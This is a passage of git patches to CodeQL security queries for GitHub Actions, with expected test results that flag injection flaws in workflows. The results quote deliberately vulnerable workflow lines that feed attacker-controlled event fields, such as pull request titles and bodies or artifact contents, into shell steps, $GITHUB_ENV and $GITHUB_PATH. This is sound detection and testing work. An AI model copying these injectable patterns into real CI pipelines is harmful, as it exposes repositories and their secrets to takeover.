workflow_run | .github/workflows/workflow_run_branches3.yml | +| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches5.yml:4:3:4:14 | workflow_run | .github/workflows/workflow_run_branches5.yml | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 4a561f26cb2..5d1ae7c3e74 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -7,7 +7,7 @@ edges | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | provenance | | | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | provenance | | | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | provenance | | -| .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | +| .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | @@ -215,18 +215,16 @@ edges | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -612,8 +613,6 @@ subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | #select -| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | From aecb478e1c4d79206d19fcecfd8cde3a3e5f4146 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 11:58:45 +0100 Subject: [PATCH 0641/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a8fab786181..29687dd7a06 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.77 +version: 0.1.78 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index f5924ff430c..7b88d83d38e 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.77 +version: 0.1.78 groups: [actions, queries] suites: codeql-suites extractor: javascript From 0ad7f08c9fc7e429585f287e9ca75e2689d6e173 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 16:15:47 +0100 Subject: [PATCH 0642/1267] fix: do not require github.event.workflow_run.id as an argument for gh run download --- ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll | 1 - 1 file changed, 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 56f36316487..31427287b0c 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -178,7 +178,6 @@ class GHRunArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { GHRunArtifactDownloadStep() { // eg: - run: gh run download ${{ github.event.workflow_run.id }} --repo "${GITHUB_REPOSITORY}" --name "artifact_name" this.getScript().getACommand().regexpMatch(".*gh\\s+run\\s+download.*") and - this.getScript().getACommand().matches("%github.event.workflow_run.id%") and ( this.getScript().getACommand().regexpMatch(unzipRegexp()) or this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) From 31a9346d2d0a1a7dd79d3d3744be9680c845538e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 11:59:59 +0100 Subject: [PATCH 0643/1267] feat: show trigger event on query results --- .../CWE-077/EnvPathInjectionCritical.ql | 4 +- .../CWE-077/EnvVarInjectionCritical.ql | 4 +- .../CWE-078/CommandInjectionCritical.ql | 4 +- .../CWE-088/ArgumentInjectionCritical.ql | 4 +- .../Security/CWE-094/CodeInjectionCritical.ql | 3 +- .../CWE-349/CachePoisoningViaCodeInjection.ql | 4 +- .../CachePoisoningViaPoisonableStep.ql | 3 +- .../UntrustedCheckoutTOCTOUCritical.ql | 3 +- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 3 +- .../CWE-829/ArtifactPoisoningCritical.ql | 4 +- .../CWE-829/UntrustedCheckoutCritical.ql | 3 +- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 3 +- .../CWE-077/EnvPathInjectionCritical.expected | 10 +- .../CWE-077/EnvVarInjectionCritical.expected | 72 ++--- .../CWE-078/CommandInjectionCritical.expected | 2 +- .../ArgumentInjectionCritical.expected | 24 +- .../CWE-094/CodeInjectionCritical.expected | 302 +++++++++--------- .../CachePoisoningViaCodeInjection.expected | 2 +- .../CachePoisoningViaPoisonableStep.expected | 14 +- .../UntrustedCheckoutTOCTOUCritical.expected | 20 +- .../UntrustedCheckoutTOCTOUHigh.expected | 4 +- .../ArtifactPoisoningCritical.expected | 34 +- .../UntrustedCheckoutCritical.expected | 80 ++--- .../CWE-829/UntrustedCheckoutHigh.expected | 44 +-- 24 files changed, 326 insertions(+), 324 deletions(-) diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql index 7d8a3b49009..3bb1558788a 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql @@ -35,5 +35,5 @@ where sink.getNode() instanceof EnvPathInjectionFromFileReadSink ) select sink.getNode(), source, sink, - "Potential PATH environment variable injection in $@, which may be controlled by an external user.", - sink, sink.getNode().toString() + "Potential PATH environment variable injection in $@, which may be controlled by an external user ($@).", + sink, sink.getNode().toString(), event, event.getName() diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index 540edfd8b5f..13086c63080 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql @@ -44,5 +44,5 @@ where ) ) select sink.getNode(), source, sink, - "Potential environment variable injection in $@, which may be controlled by an external user.", - sink, sink.getNode().toString() + "Potential environment variable injection in $@, which may be controlled by an external user ($@).", + sink, sink.getNode().toString(), event, event.getName() diff --git a/ql/src/Security/CWE-078/CommandInjectionCritical.ql b/ql/src/Security/CWE-078/CommandInjectionCritical.ql index c3d6fa74f6c..7d45b25b1a2 100644 --- a/ql/src/Security/CWE-078/CommandInjectionCritical.ql +++ b/ql/src/Security/CWE-078/CommandInjectionCritical.ql @@ -26,5 +26,5 @@ where check.protects(sink.getNode().asExpr(), event, ["command-injection", "code-injection"]) ) select sink.getNode(), source, sink, - "Potential command injection in $@, which may be controlled by an external user.", sink, - sink.getNode().asExpr().(Expression).getRawExpression() + "Potential command injection in $@, which may be controlled by an external user ($@).", sink, + sink.getNode().asExpr().(Expression).getRawExpression(), event, event.getName() diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql index 5962132d72e..6930e2f684a 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql @@ -25,5 +25,5 @@ where check.protects(sink.getNode().asExpr(), event, "argument-injection") ) select sink.getNode(), source, sink, - "Potential argument injection in $@ command, which may be controlled by an external user.", sink, - sink.getNode().(ArgumentInjectionSink).getCommand() + "Potential argument injection in $@ command, which may be controlled by an external user ($@).", + sink, sink.getNode().(ArgumentInjectionSink).getCommand(), event, event.getName() diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index a197c577948..b52c0702344 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -33,5 +33,4 @@ where ) select sink.getNode(), source, sink, "Potential code injection in $@, which may be controlled by an external user ($@).", sink, - sink.getNode().asExpr().(Expression).getRawExpression(), event, - event.getLocation().getFile().toString() + sink.getNode().asExpr().(Expression).getRawExpression(), event, event.getName() diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql index fe49b2dd3b5..23e1f223073 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql @@ -44,5 +44,5 @@ where ) ) select sink.getNode(), source, sink, - "Unprivileged code injection in $@, which may lead to cache poisoning.", sink, - sink.getNode().asExpr().(Expression).getRawExpression() + "Unprivileged code injection in $@, which may lead to cache poisoning ($@).", sink, + sink.getNode().asExpr().(Expression).getRawExpression(), event, event.getName() diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql index 74f49fccd30..95adcfaf78e 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql @@ -58,4 +58,5 @@ where // excluding privileged workflows since they can be exploited in easier circumstances not job.isPrivileged() select step, source, step, - "Potential cache poisoning in the context of the default branch " + message + "Potential cache poisoning in the context of the default branch " + message + " ($@).", event, + event.getName() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 16fb2606af7..2aacf20b35f 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -28,4 +28,5 @@ where exists(ControlCheck check1 | check1.protects(checkout, event, "untrusted-checkout")) and not exists(ControlCheck check2 | check2.protects(checkout, event, "untrusted-checkout-toctou")) select step, checkout, step, - "Insufficient protection against execution of untrusted code on a privileged workflow." + "Insufficient protection against execution of untrusted code on a privileged workflow ($@).", + event, event.getName() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index d4ed49e497a..dde6ae69c48 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -26,4 +26,5 @@ where exists(ControlCheck check1 | check1.protects(checkout, event, "untrusted-checkout")) and not exists(ControlCheck check2 | check2.protects(checkout, event, "untrusted-checkout-toctou")) select checkout, - "Insufficient protection against execution of untrusted code on a privileged workflow." + "Insufficient protection against execution of untrusted code on a privileged workflow ($@).", + event, event.getName() diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql index e4ab90e5fc2..afef7bdd82b 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql @@ -24,5 +24,5 @@ where check.protects(sink.getNode().asExpr(), event, "artifact-poisoning") ) select sink.getNode(), source, sink, - "Potential artifact poisoning in $@, which may be controlled by an external user.", sink, - sink.getNode().toString() + "Potential artifact poisoning in $@, which may be controlled by an external user ($@).", sink, + sink.getNode().toString(), event, event.getName() diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 07602af0ac4..c1d3729701d 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -52,5 +52,4 @@ where not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) and not exists(ControlCheck check | check.protects(poisonable, event, "untrusted-checkout")) select poisonable, checkout, poisonable, - "Execution of untrusted code on a privileged workflow ($@)", event, - event.getLocation().getFile().toString() + "Potential execution of untrusted code on a privileged workflow ($@)", event, event.getName() diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index 39cd1860097..98b9aee33f7 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -42,4 +42,5 @@ where not event.getName() = "issue_comment" and not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) ) -select checkout, "Potential execution of untrusted code on a privileged workflow." +select checkout, "Potential execution of untrusted code on a privileged workflow ($@)", event, + event.getName() diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected index 851aa524154..f544994fc5c 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected @@ -17,8 +17,8 @@ nodes | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | subpaths #select -| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | -| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | -| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | -| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | -| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index a79053f2240..9914ae91df1 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -93,39 +93,39 @@ nodes | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | subpaths #select -| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | -| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> 